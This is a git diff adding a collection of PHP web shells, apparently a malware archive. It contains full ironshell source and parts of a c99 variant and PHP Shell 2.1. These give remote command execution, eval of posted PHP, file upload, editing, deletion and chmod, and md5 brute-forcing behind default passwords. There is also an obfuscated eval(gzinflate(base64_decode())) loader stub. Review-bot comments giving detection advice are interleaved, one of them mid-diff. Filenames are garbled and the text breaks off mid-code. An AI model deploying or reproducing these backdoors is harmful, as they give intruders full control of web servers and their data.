$wdt; ?></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ Shell [ci] . 
Biz <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> K1r4 @ gmail. com| <a href="http://emp3ror.com"><font color="#FF0000">Emp3ror Team</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); exit(); ?>
\ No newline at end of file
diff --git a/php/PHPshell/م€گc99_madnetم€‘/c99_madnet.jpg b/php/PHPshell/م€گc99_madnetم€‘/c99_madnet.jpg
new file mode 100644
index 0000000..d443281
Binary files /dev/null and b/php/PHPshell/م€گc99_madnetم€‘/c99_madnet.jpg differ
diff --git a/php/PHPshell/م€گc99_madnetم€‘/c99_madnet2.jpg b/php/PHPshell/م€گc99_madnetم€‘/c99_madnet2.jpg
new file mode 100644
index 0000000..3315c93
Binary files /dev/null and b/php/PHPshell/م€گc99_madnetم€‘/c99_madnet2.jpg differ
diff --git a/php/PHPshell/م€گc99_madnetم€‘/smowu.php b/php/PHPshell/م€گc99_madnetم€‘/smowu.php
new file mode 100644
index 0000000..92ac161
--- /dev/null
+++ b/php/PHPshell/م€گc99_madnetم€‘/smowu.php
@@ -0,0 +1,7 @@
+<?PHP
+ //Authentication
+$login = "smowu"; //Login
+$pass = "smowu"; //Pass
+$md5_pass = ""; //If no pass then hash
+eval(gzinflate(base64_decode('')));
+?>
diff --git a/php/PHPshell/م€گc99_madnetم€‘/ه¯†ç پ.txt b/php/PHPshell/م€گc99_madnetم€‘/ه¯†ç پ.txt
new file mode 100644
index 0000000..742f9ec
--- /dev/null
+++ b/php/PHPshell/م€گc99_madnetم€‘/ه¯†ç پ.txt
@@ -0,0 +1,2 @@
+صث؛إ:smowu
+أـآë:smowu
\ No newline at end of file
diff --git a/php/PHPshell/م€گc99_madnetم€‘/è؟‍وژ¥ه¯†ç پ.jpg b/php/PHPshell/م€گc99_madnetم€‘/è؟‍وژ¥ه¯†ç پ.jpg
new file mode 100644
index 0000000..9dca11f
Binary files /dev/null and b/php/PHPshell/م€گc99_madnetم€‘/è؟‍وژ¥ه¯†ç پ.jpg differ
diff --git a/php/PHPshell/م€گironshellم€‘/ironshell.jpg b/php/PHPshell/م€گironshellم€‘/ironshell.jpg
new file mode 100644
index 0000000..d22bfad
Binary files /dev/null and b/php/PHPshell/م€گironshellم€‘/ironshell.jpg differ
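Review bot: smowu.php (the seven-line hunk on this line) is added with no marker that it is a captured web-shell loader, and its `eval(gzinflate(base64_decode('')))` call wraps an empty string, so whatever the sample originally decoded is not present and cannot be reviewed here. If the payload was stripped on purpose, say so in a first-line comment such as `// MALWARE SAMPLE: obfuscated loader stub, payload removed - keep non-executable`, and store the file under an extension the web server will not run. The plaintext `$login`/`$pass` pair is also duplicated in the neighbouring .txt file; for detection work the `eval(gzinflate(base64_decode(` chain is the string worth keying a rule on, since it survives credential changes.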
diff --git a/php/PHPshell/م€گironshellم€‘/ironshell.php b/php/PHPshell/م€گironshellم€‘/ironshell.php
new file mode 100644
index 0000000..b6931f1
--- /dev/null
+++ b/php/PHPshell/م€گironshellم€‘/ironshell.php
@@ -0,0 +1,588 @@
+<?php
+error_reporting(0); //If there is an error, we'll show it, k?
+
+$password = "login"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
+
+$me = basename(__FILE__);
+$cookiename = "wieeeee";
+
+
+if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
+{
+
+ if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
+ {
+ $_POST['pass'] = md5($_POST['pass']);
+ }
+
+ if($_POST['pass'] == $password)
+ {
+ setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
+ }
+ reload();
+}
+
+
+
+if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
+{
+ login();
+ die();
+}
+//
+//Do not cross this line! All code placed after this block can't be executed without being logged in!
+//
+
+if(isset($_GET['p']) && $_GET['p'] == "logout")
+{
+setcookie ($cookiename, "", time() - 3600);
+reload();
+}
+if(isset($_GET['dir']))
+{
+ chdir($_GET['dir']);
+}
+
+
+$pages = array(
+ 'cmd' => 'Execute Command',
+ 'eval' => 'Evaluate PHP',
+ 'mysql' => 'MySQL Query',
+ 'chmod' => 'Chmod File',
+ 'phpinfo' => 'PHPinfo',
+ 'md5' => 'md5 cracker',
+ 'headers' => 'Show headers',
+ 'logout' => 'Log out'
+);
+
+//The header, like it?
+$header = '<html>
+<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
+<head>
+<style>
+td {
+ font-size: 12px;
+ font-family: verdana;
+ color: #33FF00;
+ background: #000000;
+}
+
+#d {
+ background: #003000;
+}
+#f {
+ background: #003300;
+}
+#s {
+ background: #006300;
+}
+#d:hover
+{
+ background: #003300;
+}
+#f:hover
+{
+ background: #003000;
+}
+pre {
+ font-size: 10px;
+ font-family: verdana;
+ color: #33FF00;
+}
+a:hover {
+text-decoration: none;
+}
+
+
+input,textarea,select {
+ border-top-width: 1px;
+ font-weight: bold;
+ border-left-width: 1px;
+ font-size: 10px;
+ border-left-color: #33FF00;
+ background: #000000;
+ border-bottom-width: 1px;
+ border-bottom-color: #33FF00;
+ color: #33FF00;
+ border-top-color: #33FF00;
+ font-family: verdana;
+ border-right-width: 1px;
+ border-right-color: #33FF00;
+}
+
+hr {
+color: #33FF00;
+background-color: #33FF00;
+height: 5px;
+}
+
+</style>
+
+</head>
+<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
+<table width=100%><td id="header" width=100%>
+<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] ';
+
+foreach($pages as $page => $page_name)
+{
+ $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
+
+}
+$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
+print $header;
+
+$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';
+
+
+//
+//Page handling
+//
+if(isset($_REQUEST['p']))
+{
+ switch ($_REQUEST['p']) {
+
+ case 'cmd': //Run command
+
+ print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
+ if(isset($_REQUEST['command']))
+ {
+ print "<pre>";
+ execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
+ }
+ break;
+
+
+ case 'edit': //Edit a fie
+ if(isset($_POST['editform']))
+ {
+ $f = $_GET['file'];
+ $fh = fopen($f, 'w') or print "Error while opening file!";
+ fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
+ fclose($fh);
+ }
+ print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
+
+ if(file_exists($_GET['file']))
+ {
+ $rd = file($_GET['file']);
+ foreach($rd as $l)
+ {
+ print htmlspecialchars($l);
+ }
+ }
+
+ print "</textarea><input type=submit value=\"Save\"></form>";
+
+ break;
+
+ case 'delete': //Delete a file
+
+ if(isset($_POST['yes']))
+ {
+ if(unlink($_GET['file']))
+ {
+ print "File deleted successfully.";
+ }
+ else
+ {
+ print "Couldn't delete file.";
+ }
+ }
+
+
+ if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
+ {
+ print "Are you sure you want to delete ".$_GET['file']."?<br>
+ <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
+ <input type=hidden name=yes value=yes>
+ <input type=submit value=\"Delete\">
+ ";
+ }
+
+
+ break;
+
+
+ case 'eval': //Evaluate PHP code
+
+ print "<form action=\"".$me."?p=eval\" method=POST>
+ <textarea cols=60 rows=10 name=\"eval\">";
+ if(isset($_POST['eval']))
+ {
+ print htmlspecialchars($_POST['eval']);
+ }
+ else
+ {
+ print "print \"Yo Momma\";";
+ }
+ print "</textarea><br>
+ <input type=submit value=\"Eval\">
+ </form>";
+
+ if(isset($_POST['eval']))
+ {
+ print "<h1>Output:</h1>";
+ print "<br>";
+ eval($_POST['eval']);
+ }
+
+ break;
+
+ case 'chmod': //Chmod file
+
+
+ print "<h1>Under construction!</h1>";
+ if(isset($_POST['chmod']))
+ {
+ switch ($_POST['chvalue']){
+ case 777:
+ chmod($_POST['chmod'],0777);
+ break;
+ case 644:
+ chmod($_POST['chmod'],0644);
+ break;
+ case 755:
+ chmod($_POST['chmod'],0755);
+ break;
+ }
+ print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
+ }
+ if(isset($_GET['file']))
+ {
+ $content = urldecode($_GET['file']);
+ }
+ else
+ {
+ $content = "file/path/please";
+ }
+
+ print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
+ <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
+ <select name=\"chvalue\">
+<option value=\"777\">777</option>
+<option value=\"644\">644</option>
+<option value=\"755\">755</option>
+</select><input type=submit value=\"Change\">";
+
+ break;
+
+ case 'mysql': //MySQL Query
+
+ if(isset($_POST['host']))
+ {
+ $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
+ mysql_select_db($_POST['dbase']);
+ $sql = $_POST['query'];
+
+
+ $result = mysql_query($sql);
+
+ }
+ else
+ {
+ print "
+ This only queries the database, doesn't return data!<br>
+ <form action=\"".$me."?p=mysql\" method=POST>
+ <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
+ <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
+ <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
+ <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
+
+ <b>Query:<br></b<textarea name=query></textarea>
+ <input type=submit value=\"Query database\">
+ </form>
+ ";
+
+ }
+
+ break;
+
+ case 'createdir':
+ if(mkdir($_GET['crdir']))
+ {
+ print 'Directory created successfully.';
+ }
+ else
+ {
+ print 'Couldn\'t create directory';
+ }
+ break;
+
+
+ case 'phpinfo': //PHP Info
+ phpinfo();
+ break;
+
+
+ case 'rename':
+
+ if(isset($_POST['fileold']))
+ {
+ if(rename($_POST['fileold'],$_POST['filenew']))
+ {
+ print "File renamed.";
+ }
+ else
+ {
+ print "Couldn't rename file.";
+ }
+
+ }
+ if(isset($_GET['file']))
+ {
+ $file = basename(htmlspecialchars($_GET['file']));
+ }
+ else
+ {
+ $file = "";
+ }
+
+ print "Renaming ".$file." in folder ".realpath('.').".<br>
+ <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
+ <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
+ <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
+ <input type=submit value=\"Rename file\">
+ </form>";
+ break;
+
+ case 'md5':
+ if(isset($_POST['md5']))
+ {
+ if(!is_numeric($_POST['timelimit']))
+ {
+ $_POST['timelimit'] = 30;
+ }
+ set_time_limit($_POST['timelimit']);
+ if(strlen($_POST['md5']) == 32)
+ {
+
+ if($_POST['chars'] == "9999")
+ {
+ $i = 0;
+ while($_POST['md5'] != md5($i) && $i != 100000)
+ {
+ $i++;
+ }
+ }
+ else
+ {
+ for($i = "a"; $i != "zzzzz"; $i++)
+ {
+ if(md5($i == $_POST['md5']))
+ {
+ break;
+ }
+ }
+ }
+
+
+ if(md5($i) == $_POST['md5'])
+ {
+ print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
+ }
+
+ }
+
+ }
+
+ print "Will bruteforce the md5
+ <form action=\"".$me."?p=md5\" method=POST>
+ <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
+ <b>Characters:</b><br><select name=\"chars\">
+ <option value=\"az\">a - zzzzz</option>
+ <option value=\"9999\">1 - 9999999</option>
+ </select>
+ <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
+ <input type=submit value=\"Bruteforce md5\">
+ </form><br>*: if set_time_limit is allowed by php.ini";
+ break;
+
+ case 'headers':
+ foreach(getallheaders() as $header => $value)
+ {
+ print htmlspecialchars($header . ":" . $value)."<br>";
+
+ }
+ break;
+ }
+
+}
+else //Default page that will be shown when the page isn't found or no page is selected.
+{
+
+ $files = array();
+ $directories = array();
+
+ if(isset($_FILES['uploadedfile']['name']))
+{
+ $target_path = realpath('.').'/';
+ $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
+
+ if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
+ print "File:". basename( $_FILES['uploadedfile']['name']).
+ " has been uploaded";
+ } else{
+ echo "File upload failed!";
+ }
+}
+
+
+
+
+
+ print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
+ if ($handle = opendir('.'))
+ {
+ while (false !== ($file = readdir($handle)))
+ {
+ if(is_dir($file))
+ {
+ $directories[] = $file;
+ }
+ else
+ {
+ $files[] = $file;
+ }
+ }
+ asort($directories);
+ asort($files);
+ foreach($directories as $file)
+ {
+ print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
+ }
+
+ foreach($files as $file)
+ {
+ print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
+ }
+ }
+ else
+ {
+ print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
+ }
+
+ print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
+<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
+<input type=\"submit\" value=\"Upload File\" />
+</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
+<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
+</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
+</table>";
+
+
+}
+
+
+function login()
+{
+ print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
+ <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
+ <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
+ </form>";
+}
+function reload()
+{
+ header("Location: ".basename(__FILE__));
+}
+
+function get_execution_method()
+{
+ if(function_exists('passthru')){ $m = "passthru"; }
+ if(function_exists('exec')){ $m = "exec"; }
+ if(function_exists('shell_exec')){ $m = "shell_ exec"; }
+ if(function_exists('system')){ $m = "system"; }
+ if(!isset($m)) //No method found :-|
+ {
+ $m = "Disabled";
+ }
+ return($m);
+}
+
+function execute_command($method,$command)
+{
+ if($method == "passthru")
+ {
+ passthru($command);
+ }
+
+ elseif($method == "exec")
+ {
+ exec($command,$result);
+ foreach($result as $output)
+ {
+ print $output."<br>";
+ }
+ }
+
+ elseif($method == "shell_exec")
+ {
+ print shell_exec($command);
+ }
+
+ elseif($method == "system")
+ {
+ system($command);
+ }
+
+}
+
+function perm($file)
+{
+ if(file_exists($file))
+ {
+ return substr(sprintf('%o', fileperms($file)), -4);
+ }
+ else
+ {
+ return "????";
+ }
+}
+
+function get_color($file)
+{
+if(is_writable($file)) { return "green";}
+if(!is_writable($file) && is_readable($file)) { return "white";}
+if(!is_writable($file) && !is_readable($file)) { return "red";}
+
+
+
+}
+
+function show_dirs($where)
+{
+ if(ereg("^c:",realpath($where)))
+ {
+ $dirparts = explode('\\',realpath($where));
+ }
+ else
+ {
+ $dirparts = explode('/',realpath($where));
+ }
+
+
+
+ $i = 0;
+ $total = "";
+
+ foreach($dirparts as $part)
+ {
+ $p = 0;
+ $pre = "";
+ while($p != $i)
+ {
+ $pre .= $dirparts[$p]."/";
+ $p++;
+
+ }
+ $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
+ $i++;
+ }
+
+ return "<h2>".$total."</h2><br>";
+
+}
+print $footer;
+
+// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
+exit();
+?>
diff --git a/php/PHPshell/م€گironshellم€‘/ه¯†ç پ.txt b/php/PHPshell/م€گironshellم€‘/ه¯†ç پ.txt
new file mode 100644
index 0000000..dbd0336
--- /dev/null
+++ b/php/PHPshell/م€گironshellم€‘/ه¯†ç پ.txt
@@ -0,0 +1,5 @@
+login
+
+±¸×¢:²»ح¬ب¨دقخؤ¼‏¼ذسأ²»ح¬رصة«اّ·ض³ِہ´
+
+ بç:777 750 730
\ No newline at end of file
diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/INSTALL b/php/PHPshell/م€گphpshell-2.1م€‘/INSTALL
new file mode 100644
index 0000000..28eac98
--- /dev/null
+++ b/php/PHPshell/م€گphpshell-2.1م€‘/INSTALL
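Review bot: ironshell.php is committed as a directly servable `.php` file with nothing identifying it as a malware sample, although the hunk feeds request data straight into `eval($_POST['eval'])`, `execute_command(get_execution_method(),$_REQUEST['command'])` and `fopen($f, 'w')` on `$_GET['file']`. If this tree is a detection corpus, I would store the file under a non-executable extension or inside an archive and open it with a comment such as `// MALWARE SAMPLE: web shell kept for detection testing; must not be served`. The only gate in front of those sinks is the cookie comparison near the top, where the cookie value is the password itself and the default is the literal `login` (repeated in the adjacent .txt), so a copy found on a host should be triaged as usable by anyone rather than by one operator. For signatures, the strings that stay stable in this hunk are `error_reporting(0)`, the cookie name `wieeeee` and the `p=cmd` / `p=eval` dispatch keys.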
@@ -0,0 +1,96 @@ +INSTALL file for PHP Shell 2.1 +Copyright (C) 2000-2005 Martin Geisler <mgeisler@mgeisler.net> +Licensed under the GNU GPL. See the file COPYING for details. + + +Downloading PHP Shell +===================== + +You can always get the latest version of PHP Shell from my homepage: + + http://mgeisler.net/php-shell/ + + + +Installation +============ + +Installation is easy: first unpack the tarball or zipfile downloaded from the +above website into your webserver. This will create a subdirectory called +phpweather-2.1 for PHP Shell version 2.1. + +Try loading the file ``phpshell.php`` in your browser and check that you are +served a page that asks you to authenticate yourself with a username and a +password. If you do not see such a page, then please check that you have +entered the URL correctly and that PHP is working on your server. + + + +Configuration +============= + +All configuration happens in the ``config.php`` file. This is an ini-file +dispite its name. Ini-files consist of a number of sections, each containing +a number of 'key = "value"' pairs. PHP Shell has tree sections: '[users]' for +configuring usernames and passwords, '[aliases]' for configuring shell +aliases, and '[settings]' for general settings. + + +Setting Usernames and Passwords +------------------------------- + +As a security precaution PHP Shell has no default username and password +(people often forget to change them...). To add the user "alice" with +password "secret" you simply add + + [users] + alice = "secret" + +to the file. Note that you can add as many users as you want by simply adding +more lines like this. + +This system works, but there is a better way --- a way so that the password +does not appear in clear text in the file. For that you use the supplied +script ``pwhash.php`` to generate a hashed password. Please see the +instructions given in ``pwhash.php``. 
+ +With the above example the result could look like + + [users] + alice = "md5:7ea3b59e:eb271c4459253eaa163fcac2a119f225" + +You will not get exactly the same line if you try it out, this is a feature of +the system which means that both "alice" and "bob" could have "secret" as +their password, and you would not be able to tell from just looking at +``config.php``. + + +Shell Aliases +------------- + +As in a normal shell, PHP Shell supports alias expansion, albeit in a simple +form. Aliases are defined by 'key = "value"' pairs in the '[aliases]' +section. The "key" will be matched against the first token of the command +line and substituted with the "value" given. + +Two convenient aliases are already defined: + + [aliases] + ls = "ls -CvhF" + ll = "ls -lvhF" + + +General Settings +---------------- + +PHP has just one other setting right now --- the home directory. Change this +in the '[settings]' section. + + + +Bugs? Comments? +================ + +If you find a bug or miss something in PHP Shell, please don't hesitate to +mail me at <mgeisler@mgeisler.net>! Or you could drop by and leave a comment +at http://mgeisler.net/php-shell/. diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/config.php b/php/PHPshell/م€گphpshell-2.1م€‘/config.php new file mode 100644 index 0000000..32ffc88 --- /dev/null +++ b/php/PHPshell/م€گphpshell-2.1م€‘/config.php 
@@ -0,0 +1,54 @@
+; <?php die('Forbidden'); ?>
+; Do not remove the above line, it prevents this file from being downloaded.
+;
+; config.php file for PHP Shell 2.1
+; Copyright (C) 2005 Martin Geisler <mgeisler@mgeisler.net>
+; Licensed under the GNU GPL. See the file COPYING for details.
+
+; This ini-file has three parts:
+;
+; * [users] where you add usernames and passwords to give users access to PHP
+; Shell.
+;
+; * [aliases] where you can configure shell aliases.
+;
+; * [settings] where general settings are placed.
+
+
+[users]
+
+; The default configuration has no users defined, you have to add your own
+; (choose good passwords!). Add uses as simple 'username = "password"' lines.
+; Please quote your password using double-quotes as shown. The semi-colon ':'
+; is a reserved character, so do *not* use that in your passwords.
+;
+; For improved security it is *strongly suggested* that you the pwhash.php
+; script to generate a hashed password and store that instead of the normal
+; clear text password. Keeping your passwords in hashed form ensures that
+; they cannot be found, even if this file is disclosed. The passwords are
+; still visible in clear text during the login, though. Please follow the
+; instructions given in pwhash.php.
+
+alice = "secret"
+
+[aliases]
+
+; Alias expansion. Change the two examples as needed and add your own
+; favorites --- feel free to suggest more defaults! The command line you
+; enter will only be expanded on the very first token and only once, so having
+; 'ls' expand into 'ls -CvhF' does not cause an infinite recursion.
+
+ls = "ls -CvhF"
+ll = "ls -lvhF"
+
+
+
+[settings]
+
+; General settings for PHP Shell.
+
+; Home directory. PHP Shell will change to this directory upon startup and
+; whenever a bare 'cd' command is given. This can be an absolute path or a
+; path relative to the PHP Shell installation directory.
+
+home-directory = "."
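Review bot: The shipped `[users]` section contains a live account, `alice = "secret"`, although the comment directly above it says the default configuration has no users defined. Anyone who installs the file unchanged puts a command-execution page behind a credential that is also printed as the worked example in INSTALL. Ship the entry commented out, `; alice = "secret"`, so that login fails closed until the operator adds a user, preferably in the hashed form produced by pwhash.php. The same comment calls ':' a semi-colon; it is a colon.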
diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/phpshell3.jpg b/php/PHPshell/م€گphpshell-2.1م€‘/phpshell3.jpg new file mode 100644 index 0000000..5e6fe49 Binary files /dev/null and b/php/PHPshell/م€گphpshell-2.1م€‘/phpshell3.jpg differ diff --git a/php/PHPshell/م€گphpshell-2.1م€‘/phpshell3.php b/php/PHPshell/م€گphpshell-2.1م€‘/phpshell3.php new file mode 100644 index 0000000..cd9a3c0 --- /dev/null +++ b/php/PHPshell/م€گphpshell-2.1م€‘/phpshell3.php 
@@ -0,0 +1,408 @@ +<?php // -*- coding: utf-8 -*- + +/* + + ************************************************************** + * PHP Shell 2.1 * + ************************************************************** + + PHP Shell is an interactive PHP script that will execute any command + entered. See the files README, INSTALL, and SECURITY or + http://mgeisler.net/php-shell/ for further information. + + Copyright (C) 2000-2005 Martin Geisler <mgeisler@mgeisler.net> + + This program is free software; you can redistribute it and/or + modify it under the terms of the GNU General Public License + as published by the Free Software Foundation; either version 2 + of the License, or (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You can get a copy of the GNU General Public License from this + address: http://www.gnu.org/copyleft/gpl.html#SEC1 + You can also write to the Free Software Foundation, Inc., 59 Temple + Place - Suite 330, Boston, MA 02111-1307, USA. + +*/ + +/* There are no user-configurable settings in this file anymore, please see + * config.php instead. */ + + +/* This error handler will turn all notices, warnings, and errors into fatal + * errors, unless they have been suppressed with the @-operator. */ +function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { + /* The @-opertor (used with chdir() below) temporarely makes + * error_reporting() return zero, and we don't want to die in that case. + * We do note the error in the output, though. */ + if (error_reporting() == 0) { + $_SESSION['output'] .= $errstr . 
"\n"; + } else { + die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" + "http://www.w3.org/TR/html4/strict.dtd"> +<html> +<head> + <title>PHP Shell 2.1</title> + <link rel="stylesheet" href="style.css" type="text/css"> +</head> +<body> + <h1>Fatal Error!</h1> + <p><b>' . $errstr . '</b></p> + <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p> + + <hr> + + <p>Please consult the <a href="README">README</a>, <a + href="INSTALL">INSTALL</a>, and <a href="SECURITY">SECURITY</a> files for + instruction on how to use PHP Shell.</p> + + <hr> + + <address> + Copyright &copy; 2000&ndash;2005, <a + href="mailto:mgeisler@mgeisler.net">Martin Geisler</a>. Get the latest + version at <a + href="http://mgeisler.net/php-shell/">mgeisler.net/php-shell/</a>. + </address> + +</body> +</html>'); + } +} + +/* Installing our error handler makes PHP die on even the slightest problem. + * This is what we want in a security critical application like this. */ +set_error_handler('error_handler'); + + +function logout() { + /* Empty the session data, except for the 'authenticated' entry which the + * rest of the code needs to be able to check. */ + $_SESSION = array('authenticated' => false); + + /* Unset the client's cookie, if it has one. */ +// if (isset($_COOKIE[session_name()])) +// setcookie(session_name(), '', time()-42000, '/'); + + /* Destroy the session data on the server. This prevents the simple + * replay attach where one uses the back button to re-authenticate using + * the old POST data since the server wont know the session then.*/ +// session_destroy(); +} + + +function stripslashes_deep($value) { + if (is_array($value)) + return array_map('stripslashes_deep', $value); + else + return stripslashes($value); +} + +if (get_magic_quotes_gpc()) + $_POST = stripslashes_deep($_POST); + +/* Initialize some variables we need again and again. */ +$username = isset($_POST['username']) ? $_POST['username'] : ''; +$password = isset($_POST['password']) ? 
$_POST['password'] : ''; +$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; + +$command = isset($_POST['command']) ? $_POST['command'] : ''; +$rows = isset($_POST['rows']) ? $_POST['rows'] : 24; +$columns = isset($_POST['columns']) ? $_POST['columns'] : 80; + + +/* Load the configuration. */ +$ini = parse_ini_file('config.php', true); + +if (empty($ini['settings'])) + $ini['settings'] = array(); + +/* Default settings --- these settings should always be set to something. */ +$default_settings = array('home-directory' => '.'); + +/* Merge settings. */ +$ini['settings'] = array_merge($default_settings, $ini['settings']); + + +session_start(); + +/* Delete the session data if the user requested a logout. This leaves the + * session cookie at the user, but this is not important since we + * authenticates on $_SESSION['authenticated']. */ +if (isset($_POST['logout'])) + logout(); + +/* Attempt authentication. */ +if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && + isset($ini['users'][$username])) { + if (strchr($ini['users'][$username], ':') === false) { + // No seperator found, assume this is a password in clear text. + $_SESSION['authenticated'] = ($ini['users'][$username] == $password); + } else { + list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); + $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); + } +} + + +/* Enforce default non-authenticated state if the above code didn't set it + * already. */ +if (!isset($_SESSION['authenticated'])) + $_SESSION['authenticated'] = false; + + +if ($_SESSION['authenticated']) { + /* Initialize the session variables. */ + if (empty($_SESSION['cwd'])) { + $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); + $_SESSION['history'] = array(); + $_SESSION['output'] = ''; + } + + if (!empty($command)) { + /* Save the command for late use in the JavaScript. 
